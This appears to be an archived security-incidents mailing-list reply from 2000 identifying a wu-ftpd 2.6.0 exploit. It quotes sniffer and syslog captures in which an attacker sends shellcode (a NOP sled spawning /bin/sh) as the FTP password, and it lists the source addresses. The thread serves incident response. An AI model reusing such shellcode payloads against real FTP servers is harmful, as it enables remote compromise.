Security Incidents mailing list archives
Re: New or old FTP exploit?
From: Fredrik Ostergren <fredrik.ostergren () FREEBOX COM>
Date: Wed, 9 Aug 2000 20:56:22 -0000
Hi ! I believe it's the "new" wuftpd2.6.0(1) exploit, I had the same attacks on a network and noticed the exact login functions using a sniffer, that "bin0sh1" is common for the "new" wuftpd exploit. / Fredrik Ostergren. Our /16 has been scanned at least two times from different foreign addresses during the last weeks with an exploit that seems to be the same. On both occasions, the connections are to port 21 with the would-be intruder trying to log in as "USER ftp" and "PASS long-string-with-nops-and-shellcode-in-it". From one of our users, I got the following log saved by sniffit: <FONT COLOR="#222255">> USER ftp</FONT> <FONT COLOR="#222255">> USER ftp</FONT> <FONT COLOR="#222255">> PASS 1À1Û1É° FÍ1À1ÛCÙA°?Íëk^1À1É^Ff¹ÿÿ°'Í1À^°=Í1À1Û^ C1ÉþÉ1À^°ÍþÉuó1ÀF ^°=Íþ°0þÈF1ÀFvFóNV° Í1À1Û°Íèÿÿÿÿÿÿ0bin0sh1..11</FONT> <FONT COLOR="#222255">> PASS 1À1Û1É° FÍ1À1ÛCÙA°?Íëk^1À1É^Ff¹ÿÿ°'Í1À^°=Í1À1Û^ C1ÉþÉ1À^°ÍþÉuó1ÀF ^°=Íþ°0þÈF1ÀFvFóNV° Í1À1Û°Íèÿÿÿÿÿÿ0bin0sh1..11</FONT> Another user sent me this: <FONT COLOR="#222255">>Jul 22 05:47:16 yyyyy ftpd[11650]: ANONYMOUS FTP LOGIN FROM xxxxxxxxxxxxxxxxxxxx [xxx.xxx.xx.xx],</FONT> <FONT COLOR="#222255">> 1À1Û1É° FÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^H C^B1ÉþÉ1À^^H°^LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^H F^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11</FONT> <FONT COLOR="#222255">> Jul 22 05:47:27 yyyyy ftpd[11650]: FTP session closed Jul 22 07:48:13</FONT> Could somebody please tell me if this is an old exploit for some FTP deamon, or a new exploit? We have seen attacks coming from: 200.255.45.90 ppp50.cruiser.com.br 212.69.228.245 Legend Internet Ltd -- Kent Engström, Linköping University Incident Response Team <A HREF="mailto:kent () unit liu se">kent () unit liu se</A> abuse () liu se +46 13 28 1744 UNIT, Linköping University; SE-581 83 LINKÖPING; SWEDEN
Current thread:
- New or old FTP exploit? Kent Engström (Aug 07)
- Re: New or old FTP exploit? Przemyslaw Frasunek (Aug 09)
- Re: New or old FTP exploit? Fredrik Ostergren (Aug 10)
- Re: New or old FTP exploit? Bruce Dang (Aug 10)